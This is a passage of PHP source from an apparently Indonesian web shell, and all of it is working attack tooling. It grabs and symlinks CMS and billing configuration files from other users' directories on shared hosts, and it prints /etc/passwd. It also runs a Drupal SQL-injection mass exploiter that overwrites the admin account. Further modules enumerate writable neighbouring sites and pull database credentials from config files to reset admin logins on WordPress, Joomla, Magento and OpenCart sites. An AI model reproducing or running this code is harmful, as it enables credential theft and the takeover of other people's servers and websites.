"/home/$user_kuda/public_html/beta/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/portal/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/site/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/wp/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/WP/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/news/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/wordpress/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/test/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/demo/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/home/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/v1/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/v2/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/press/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/new/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/blogs/wp-config.php" => "Wordpress",
"/home/$user_kuda/public_html/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/blog/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/submitticket.php" => "^WHMCS",
"/home/$user_kuda/public_html/cms/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/beta/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/portal/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/site/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/main/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/home/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/demo/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/test/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/v1/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/v2/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/new/configuration.php" => "Joomla",
"/home/$user_kuda/public_html/WHMCS/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/whmcs1/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Whmcs/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/whmcs/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/whmcs/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/WHMC/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Whmc/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/whmc/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/WHM/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Whm/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/whm/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/HOST/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Host/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/host/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/SUPPORTES/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Supportes/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/supportes/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/domains/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/domain/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Hosting/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/HOSTING/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/hosting/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/CART/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Cart/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/cart/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/ORDER/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Order/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/order/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/CLIENT/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Client/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/client/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Clientarea/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/clientarea/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/SUPPORT/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Support/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/support/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/BILLING/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Billing/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/billing/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/BUY/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Buy/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/buy/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/MANAGE/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Manage/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/manage/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/ClientSupport/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Clientsupport/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/clientsupport/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/CHECKOUT/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Checkout/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/checkout/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Billings/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/billings/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/BASKET/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Basket/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/basket/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/SECURE/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Secure/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/secure/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/SALES/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Sales/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/sales/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/BILL/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Bill/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/bill/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/PURCHASE/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Purchase/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/purchase/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/ACCOUNT/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Account/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/account/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/USER/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/User/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/user/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/CLIENTS/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Clients/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/clients/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/Billings/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/billings/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/MY/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/My/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/my/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/secure/whm/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/secure/whmcs/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/panel/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/clientes/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/cliente/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/support/order/submitticket.php" => "WHMCS",
"/home/$user_kuda/public_html/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/boxbilling/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/box/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/host/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/Host/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/supportes/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/support/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/hosting/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/cart/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/order/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/client/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/clients/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/cliente/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/clientes/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/billing/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/billings/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/my/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/secure/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/support/order/bb-config.php" => "BoxBilling",
"/home/$user_kuda/public_html/includes/dist-configure.php" => "Zencart",
"/home/$user_kuda/public_html/zencart/includes/dist-configure.php" => "Zencart",
"/home/$user_kuda/public_html/products/includes/dist-configure.php" => "Zencart",
"/home/$user_kuda/public_html/cart/includes/dist-configure.php" => "Zencart",
"/home/$user_kuda/public_html/shop/includes/dist-configure.php" => "Zencart",
"/home/$user_kuda/public_html/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/hostbills/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/host/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/Host/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/supportes/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/support/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/hosting/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/cart/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/order/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/client/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/clients/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/cliente/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/clientes/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/billing/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/billings/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/my/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/secure/includes/iso4217.php" => "Hostbills",
"/home/$user_kuda/public_html/support/order/includes/iso4217.php" => "Hostbills"
);  

foreach($grab_config as $config => $nama_config) {
	if($_POST['config'] == 'grab') {
$ambil_config = file_get_contents($config);
if($ambil_config == '') {
} else {
$file_config = fopen("kuda_configv2/$user_kuda-$nama_config.txt","w");
fputs($file_config,$ambil_config);
}
}
if($_POST['config'] == 'symlink') {
@symlink($config,"kuda_Symconfig/".$user_kuda."-".$nama_config.".txt");
}
if($_POST['config'] == '404') {
$sym404=symlink($config,"kuda_sym404/".$user_kuda."-".$nama_config.".txt");
if($sym404){
@mkdir("kuda_sym404/".$user_kuda."-".$nama_config.".txt404", 0777);
$htaccess="Options Indexes FollowSymLinks
DirectoryIndex kuda.html
HeaderName kuda.txt
Satisfy Any
IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
IndexIgnore *";

@file_put_contents("kuda_sym404/".$user_kuda."-".$nama_config.".txt404/.htaccess",$htaccess);

@symlink($config,"kuda_sym404/".$user_kuda."-".$nama_config.".txt404/kuda.txt");

	}

}

                    }     
		}  if($_POST['config'] == 'grab') {
            echo "<center><a href='?dir=$dir/kuda_configv2'><font color=lime>DONE</font></a></center>";
		}
    if($_POST['config'] == '404') {
        echo "<center>
<a href='kuda_sym404/root/'><font color='lime'>Symlinknya</a></font>
<br><a href='kuda_sym404/' target='_blank'><font color='lime'>Configurations</a></font></center>";
    }
     if($_POST['config'] == 'symlink') {
echo "<center>
<a href='kuda_symconfig/root/'><font color='lime'>Symlinknya</a></font>
<br><a href='kuda_symconfig/'' target='_blank'><font color='lime'>Configurations</a></font></center>";
			}if($_POST['config'] == 'symvhost') {
echo "<center>
<a href='kuda_symvhost/root/'><font color='lime'>Symlinknya</a></font>
<br><a href='kuda_symvhost/' target='_blank'><font color='lime'>Configurations</a></font></center>";
			}
		
		
		}else{
        echo "<form method='post' action=''><center>
		</center></select><br><textarea name='passwd' class='area' rows='15' cols='60'>";
        echo include("/etc/passwd"); 
        echo "</textarea><br><br><center>
        <select class='select' name='config' style='width: 450px;' height='10'>
        <option value='grab'>Config Grab</option>
        <option value='404'>Config 404</option>
		<option value='symlink'>Symlink Config</option>
		<option value='symvhosts'>Vhosts Config Grab</option> <input type='submit' value='Start!!'></td></tr></center>";
    }
}
elseif($_GET['do'] == 'drupalex') {
echo "
<center>
<h3>Drupal Mass Exploiter</h3>
<form method='post' action=''>
<textarea cols='60' rows='15' name='url' placeholder='http://kudagans.go.id'></textarea><br><br>
<input type='submit' style='border-color:white' name='submit' value='SIKAT!'>
</form>
</center>";
$drupal  = ($_GET["drupal"]);
if($drupal == 'drupal'){
$filename = $_FILES['file']['name'];
$filetmp  = $_FILES['file']['tmp_name'];
echo "<form method='post' enctype='multipart/form-data'>
   <input type='file' name='file'>
   <input type='submit' value='drupal!'>
</form>";
move_uploaded_file($filetmp,$filename);
}
    error_reporting(0);
    if (isset($_POST['submit'])) {
        function exploit($url) {
            $post_data = "name[0;update users set name %3D 'mrxbarakuda' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
            $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
            $ctx = stream_context_create($params);
            $data = file_get_contents($url . '/user/login/', null, $ctx);
            if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
                $fp = fopen("exploited.txt", 'a+');
                fwrite($fp, "Exploited!  User: mrxbarakuda Pass: admin  => {$url}/user/login");
                fwrite($fp, "
");
                fwrite($fp, "--------------------------------------------------------------------------------------------------");
                fwrite($fp, "
");
                fclose($fp);
                               
                echo "<font color='lime'>Success => </font><font color='white'>User: mrxbarakuda Pass: admin</font> - <a href='{$url}/user/login' target=_blank ><font color='lime'> {$url}/user/login </font></a><br>";
            } else {
                echo "<font color='red'>Failed => {$url}/user/login</font><br>";
            }
        }
               
        $urls = explode("
", $_POST['url']);
        foreach ($urls as $url) {
            $url = @trim($url);
            echo exploit($url);
        }
    }

}
elseif($_GET['do'] == 'loghunter') { 
echo '<center><h3>Log Hunter</h3></center>';
echo "<center>";
echo "<form action='' method='post'>"; 
?><br>DIR: <input type="text" style="width: 200px;" value="<?=getcwd();?>" name="shc_dir">
<?php
echo "<input type='submit' name='submit' value='Scan Now!'>"; 
echo "</form>"; 
echo "<pre style='text-align: left;'>";
error_reporting(0);
/*
Name    : Log Hunter (Grab Email)
Date    : 26/03/2016 05:53 PM
Link    : http://facebook.com/bug7sec
Link    : http://pastebin.com/u/shor7cut
Author  : Shor7cut
*/
if($_POST['submit']){
function tampilkan($shcdirs){
foreach(scandir($shcdirs) as $shc)
    {
        if($shc!='.' && $shc!='..')
        {
            $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
            if( !is_dir($shc) && !eregi("css", $shc) ){
 
                $fgt    = file_get_contents($shc);
                $ifgt   = exif_read_data($shc);
                $jembut = "COMPUTED";
                $taik   = "UserComment";
                $shcm = "/mail['(']/";
                if($ifgt[$jembut][$taik]){
                    echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font><br>";
                }
                preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok);
                $hcs  = "/base64_decode/";
                $exif = "/exif_read_data/";
                preg_match($shcm, addslashes($fgt), $mailshc);
                preg_match($hcs,  addslashes($fgt), $shcmar);
                preg_match($exif, addslashes($fgt), $shcxif);
                if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){
                }
                if(eregi('tmp_name', $fgt)){
                    echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>".$shc."</font><br>";
                }
                if($shcmar[0]){
                    echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>".$shc."</font><br>";
                }
                if($mailshc[0]){
                    echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>".$shc."</font><br>";
                }
                if($shcxif[0]){
                    echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font> </font><font color=red>{Manual Check}</font><br>";
                }
                if(eregi("js", $shc)){
                            echo "[<font color=red>Javascript</font>] <font color=#2196F3>".$shc."</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
                }
                if($cocok[0]){
                    foreach ($cocok[0] as $key => $shcmail) {
                        if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) {
                            echo "[<font color=greenyellow>SendMail</font>] <font color=#2196F3>".$shc."</font> { ".$shcmail." }<br>";
                        }
                    }
                }
           
            }else{
                tampilkan($shc);
            }
        }
    }
}
tampilkan($_POST['shc_dir']);
}
echo "</pre>"; 
echo "</center>";
}
elseif($_GET['do'] == 'jumping') {
    $i = 0;
    echo "<div class='margin: 5px auto;'>";
    if(preg_match("/hsphere/", $dir)) {
        $urls = explode("
", $_POST['url']);
        if(isset($_POST['jump'])) {
            echo "<pre>";
            foreach($urls as $url) {
                $url = str_replace(array("http://","www."), "", strtolower($url));
                $etc = "/etc/passwd";
                $f = fopen($etc,"r");
                while($gets = fgets($f)) {
                    $pecah = explode(":", $gets);
                    $user = $pecah[0];
                    $dir_user = "/hsphere/local/home/$user";
                    if(is_dir($dir_user) === true) {
                        $url_user = $dir_user."/".$url;
                        if(is_readable($url_user)) {
                            $i++;
                            $jrw = "[<font color=red>R</font>] <a href='?dir=$url_user'><font color=#0F6516>$url_user</font></a>";
                            if(is_writable($url_user)) {
                                $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=#0F6516>$url_user</font></a>";
                            }
                            echo $jrw."<br>";
                        }
                    }
                }
            }
        if($i == 0) {
        } else {
            echo "<br>Total ada ".$i." Bangsat! di ".$ip;
        }
        echo "</pre>";
        } else {
            echo '<center>
                  <form method="post">
                  List Domains: <br>
                  <textarea name="url" style="width: 500px; height: 250px;">';
            $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
            while($getss = fgets($fp)) {
                echo $getss;
            }
            echo  '</textarea><br>
                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
                  </form></center>';
        }
    } elseif(preg_match("/vhosts|vhost/", $dir)) {
        preg_match("//var/www/(.*?)//", $dir, $vh);
        $urls = explode("
", $_POST['url']);
        if(isset($_POST['jump'])) {
            echo "<pre>";
            foreach($urls as $url) {
                $url = str_replace("www.", "", $url);
                $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
                if(is_dir($web_vh) === true) {
                    if(is_readable($web_vh)) {
                        $i++;
                        $jrw = "[<font color=red>R</font>] <a href='?dir=$web_vh'><font color=#0F6516>$web_vh</font></a>";
                        if(is_writable($web_vh)) {
                            $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=#0F6516>$web_vh</font></a>";
                        }
                        echo $jrw."<br>";
                    }
                }
            }
        if($i == 0) {
        } else {
            echo "<br>Total ada ".$i." Bangsat! di ".$ip;
        }
        echo "</pre>";
        } else {
            echo '<center>
                  <form method="post">
                  List Domains: <br>
                  <textarea name="url" style="width: 500px; height: 250px;">';
                  bing("ip:$ip");
            echo  '</textarea><br>
                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
                  </form></center>';
        }
    } else {
        echo "<pre>";
        $etc = fopen("/etc/passwd", "r") or die("<font color=red><i>Can't read /etc/passwd</i></font>");
        while($passwd = fgets($etc)) {
            if($passwd == '' || !$etc) {
                echo "<font color=red><i>Can't read /etc/passwd</i></font>";
            } else {
                preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
                foreach($user_jumping[1] as $user_idx_jump) {
                    $user_jumping_dir = "/home/$user_idx_jump/public_html";
                    if(is_readable($user_jumping_dir)) {
                        $i++;
                        $jrw = "[<font color=red>R</font>] <a href='?dir=$user_jumping_dir'><font color=silver>$user_jumping_dir</font></a>";
                        if(is_writable($user_jumping_dir)) {
                            $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=silver>$user_jumping_dir</font></a>";
                        }
                        echo $jrw;
                        if(function_exists('posix_getpwuid')) {
                            $domain_jump = file_get_contents("/etc/named.conf");   
                            if($domain_jump == '') {
                                echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
                            } else {
                                preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
                                foreach($domains_jump[1] as $dj) {
                                    $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
                                    $user_jumping_url = $user_jumping_url['name'];
                                    if($user_jumping_url == $user_idx_jump) {
                                        echo " => ( <u>$dj</u> )<br>";
                                        break;
                                    }
                                }
                            }
                        } else {
                            echo "<br>";
                        }
                    }
                }
            }
        }
        if($i == 0) {
        } else {
            echo "<br>Total ada ".$i." Bangsat! di ".$ip;
        }
        echo "</pre>";
    }
    echo "</div>";
}
elseif($_GET['do'] == 'auto_edit_user') {
    if($_POST['hajar']) {
        if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
            echo "<center>username atau password harus lebih dari 6 karakter</center>";
        } else {
            $user_baru = $_POST['user_baru'];
            $pass_baru = md5($_POST['pass_baru']);
            $conf = $_POST['config_dir'];
            $scan_conf = scandir($conf);
            foreach($scan_conf as $file_conf) {
                if(!is_file("$conf/$file_conf")) continue;
                $config = file_get_contents("$conf/$file_conf");
                if(preg_match("/JConfig|joomla/",$config)) {
                    $dbhost = ambilkata($config,"host = '","'");
                    $dbuser = ambilkata($config,"user = '","'");
                    $dbpass = ambilkata($config,"password = '","'");
                    $dbname = ambilkata($config,"db = '","'");
                    $dbprefix = ambilkata($config,"dbprefix = '","'");
                    $prefix = $dbprefix."users";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result['id'];
                    $site = ambilkata($config,"sitename = '","'");
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
					echo "Config => ".$file_conf."<br>";
                    echo "CMS => Joomla<br>";
                    if($site == '') {
                        echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
                    } else {
                        echo "Sitename => $site<br>";
                    }
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
                    }
                    mysql_close($conn);
                } elseif(preg_match("/WordPress/",$config)) {
                    $dbhost = ambilkata($config,"DB_HOST', '","'");
                    $dbuser = ambilkata($config,"DB_USER', '","'");
                    $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
                    $dbname = ambilkata($config,"DB_NAME', '","'");
                    $dbprefix = ambilkata($config,"table_prefix  = '","'");
                    $prefix = $dbprefix."users";
                    $option = $dbprefix."options";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result[ID];
                    $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
                    $result2 = mysql_fetch_array($q2);
                    $target = $result2[option_value];
                    if($target == '') {
                        $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                    } else {
                        $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
                    }
                    $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
                    echo "Config => ".$file_conf."<br>";
                    echo "CMS => Wordpress<br>";
                    echo $url_target;
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
                    }
                    mysql_close($conn);
                } elseif(preg_match("/Magento|Mage_Core/",$config)) {
                    $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
                    $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
                    $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
                    $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
                    $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
                    $prefix = $dbprefix."admin_user";
                    $option = $dbprefix."core_config_data";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result[user_id];
                    $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
                    $result2 = mysql_fetch_array($q2);
                    $target = $result2[value];
                    if($target == '') {
                        $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                    } else {
                        $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
                    }
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
                    echo "Config => ".$file_conf."<br>";
                    echo "CMS => Magento<br>";
                    echo $url_target;
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
                    }
                    mysql_close($conn);
                } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
                    $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
                    $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
                    $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
                    $dbname = ambilkata($config,"'DB_DATABASE', '","'");
                    $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
                    $prefix = $dbprefix."user";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result[user_id];
                    $target = ambilkata($config,"HTTP_SERVER', '","'");
                    if($target == '') {
                        $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                    } else {
                        $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
                    }
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
                    echo "Config => ".$file_conf."<br>";
                    echo "CMS => OpenCart<br>";
                    echo $url_target;
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
                    }
                    mysql_close($conn);
                } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
                    $dbhost = ambilkata($config,'server = "','"');
                    $dbuser = ambilkata($config,'username = "','"');
                    $dbpass = ambilkata($config,'password = "','"');
                    $dbname = ambilkata($config,'database = "','"');
                    $prefix = "users";
                    $option = "identitas";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
                    $result = mysql_fetch_array($q);
                    $target = $result[alamat_website];
                    if($target == '') {
                        $target2 = $result[url];
                        $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                        if($target2 == '') {
                            $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                        } else {
                            $cek_login3 = file_get_contents("$target2/adminweb/");
                            $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
                            if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
                                $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
                            } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
                                $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
                            } else {
